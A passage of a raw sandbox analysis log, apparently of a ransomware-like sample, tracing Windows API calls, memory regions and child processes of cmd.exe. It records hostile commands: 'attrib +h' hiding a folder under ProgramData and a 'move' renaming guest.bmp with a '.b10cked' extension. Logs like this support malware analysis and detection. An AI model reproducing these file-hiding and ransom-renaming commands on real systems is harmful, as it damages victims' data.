hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.175] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.175] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.175] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.175] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.175] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.176] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.177] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.178] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.251] FindClose (in: hFindFile=0x4d0830 | out: hFindFile=0x4d0830) returned 1 [0193.251] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0193.255] _close (_FileHandle=3) returned 0 [0193.255] GetConsoleTitleW (in: lpConsoleTitle=0x30f628, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.255] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0193.255] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0193.255] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0193.255] FindClose (in: hFindFile=0x4d0830 | out: hFindFile=0x4d0830) returned 1 [0193.256] FindClose (in: hFindFile=0x4d0830 | out: hFindFile=0x4d0830) returned 1 [0193.256] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0193.256] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0193.256] GetConsoleTitleW (in: lpConsoleTitle=0x30f3bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.256] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f244, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f30c | out: lpAttributeList=0x30f244, lpSize=0x30f30c) returned 1 [0193.256] UpdateProcThreadAttribute (in: lpAttributeList=0x30f244, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f304, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f244, lpPreviousValue=0x0) returned 1 [0193.256] GetStartupInfoW (in: lpStartupInfo=0x30f200 | out: lpStartupInfo=0x30f200*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0193.256] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0193.256] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f2a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f2ec | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" ", lpProcessInformation=0x30f2ec*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb58, dwThreadId=0xe60)) returned 1 [0193.258] CloseHandle (hObject=0x50) returned 1 [0193.258] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0193.258] GetEnvironmentStringsW () returned 0x4d2d50* [0193.258] FreeEnvironmentStringsW (penv=0x4d2d50) returned 1 [0193.258] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0193.327] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x30f1e0 | out: lpExitCode=0x30f1e0*=0x0) returned 1 [0193.327] CloseHandle (hObject=0x4c) returned 1 [0193.327] _vsnwprintf (in: _Buffer=0x30f328, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f1ec | out: _Buffer="00000000") returned 8 [0193.327] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0193.328] GetEnvironmentStringsW () returned 0x4d2d50* [0193.328] FreeEnvironmentStringsW (penv=0x4d2d50) returned 1 [0193.328] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0193.328] GetEnvironmentStringsW () returned 0x4d2d50* [0193.328] FreeEnvironmentStringsW (penv=0x4d2d50) returned 1 [0193.328] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f244 | out: lpAttributeList=0x30f244) [0193.328] GetConsoleTitleW (in: lpConsoleTitle=0x30f628, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.328] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0193.328] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0193.328] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0193.328] FindClose (in: hFindFile=0x4d0830 | out: hFindFile=0x4d0830) returned 1 [0193.329] FindClose (in: hFindFile=0x4d0830 | out: hFindFile=0x4d0830) returned 1 [0193.329] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0193.329] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0193.329] GetConsoleTitleW (in: lpConsoleTitle=0x30f3bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.329] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f244, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f30c | out: lpAttributeList=0x30f244, lpSize=0x30f30c) returned 1 [0193.329] UpdateProcThreadAttribute (in: lpAttributeList=0x30f244, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f304, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f244, lpPreviousValue=0x0) returned 1 [0193.329] GetStartupInfoW (in: lpStartupInfo=0x30f200 | out: lpStartupInfo=0x30f200*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0193.329] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0193.329] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f2a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f2ec | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\"", lpProcessInformation=0x30f2ec*(hProcess=0x50, hThread=0x4c, dwProcessId=0xe0c, dwThreadId=0xd7c)) returned 1 [0193.330] CloseHandle (hObject=0x4c) returned 1 [0193.330] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0193.330] GetEnvironmentStringsW () returned 0x4d3790* [0193.331] FreeEnvironmentStringsW (penv=0x4d3790) returned 1 [0193.331] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0193.366] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30f1e0 | out: lpExitCode=0x30f1e0*=0x0) returned 1 [0193.366] CloseHandle (hObject=0x50) returned 1 [0193.366] _vsnwprintf (in: _Buffer=0x30f328, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f1ec | out: _Buffer="00000000") returned 8 [0193.366] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0193.366] GetEnvironmentStringsW () returned 0x4d3790* [0193.366] FreeEnvironmentStringsW (penv=0x4d3790) returned 1 [0193.366] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0193.366] GetEnvironmentStringsW () returned 0x4d3790* [0193.366] FreeEnvironmentStringsW (penv=0x4d3790) returned 1 [0193.366] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f244 | out: lpAttributeList=0x30f244) [0193.366] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.366] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0193.367] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.367] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0193.367] _get_osfhandle (_FileHandle=0) returned 0x3 [0193.367] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0193.367] SetConsoleInputExeNameW () returned 0x1 [0193.367] GetConsoleOutputCP () returned 0x1b5 [0193.367] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0193.367] SetThreadUILanguage (LangId=0x0) returned 0x409 [0193.367] exit (_Code=0) Process: id = "437" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0xaa4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28293 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28294 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28295 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28296 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 28297 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28298 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28299 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28300 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28301 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 28302 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28334 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28335 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28336 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28337 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 28338 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 28339 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28340 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28341 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28342 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28343 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28344 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28345 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28346 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28347 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28348 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 28349 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28350 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28351 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28352 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 28353 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 28354 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 28355 start_va = 0x550000 end_va = 0x650fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 28356 start_va = 0x660000 end_va = 0x125ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 28357 start_va = 0x1260000 end_va = 0x13c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Thread: id = 626 os_tid = 0xb2c [0192.781] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fbac | out: lpSystemTimeAsFileTime=0x26fbac*(dwLowDateTime=0xa7c8ea80, dwHighDateTime=0x1d440a9)) [0192.781] GetCurrentProcessId () returned 0xaa4 [0192.781] GetCurrentThreadId () returned 0xb2c [0192.781] GetTickCount () returned 0x36cd5 [0192.781] QueryPerformanceCounter (in: lpPerformanceCount=0x26fba4 | out: lpPerformanceCount=0x26fba4*=24957060224) returned 1 [0192.782] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0192.782] __set_app_type (_Type=0x1) [0192.782] __p__fmode () returned 0x76b331f4 [0192.782] __p__commode () returned 0x76b331fc [0192.782] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0192.782] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0192.782] GetCurrentThreadId () returned 0xb2c [0192.782] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb2c) returned 0x38 [0192.782] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0192.783] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0192.783] SetThreadUILanguage (LangId=0x0) returned 0x409 [0192.783] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0192.783] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fb3c | out: phkResult=0x26fb3c*=0x0) returned 0x2 [0192.783] VirtualQuery (in: lpAddress=0x26fb73, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0192.783] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0192.783] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0192.783] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0192.783] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0192.783] GetConsoleOutputCP () returned 0x1b5 [0192.783] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.783] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0192.783] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.783] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0192.783] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.783] 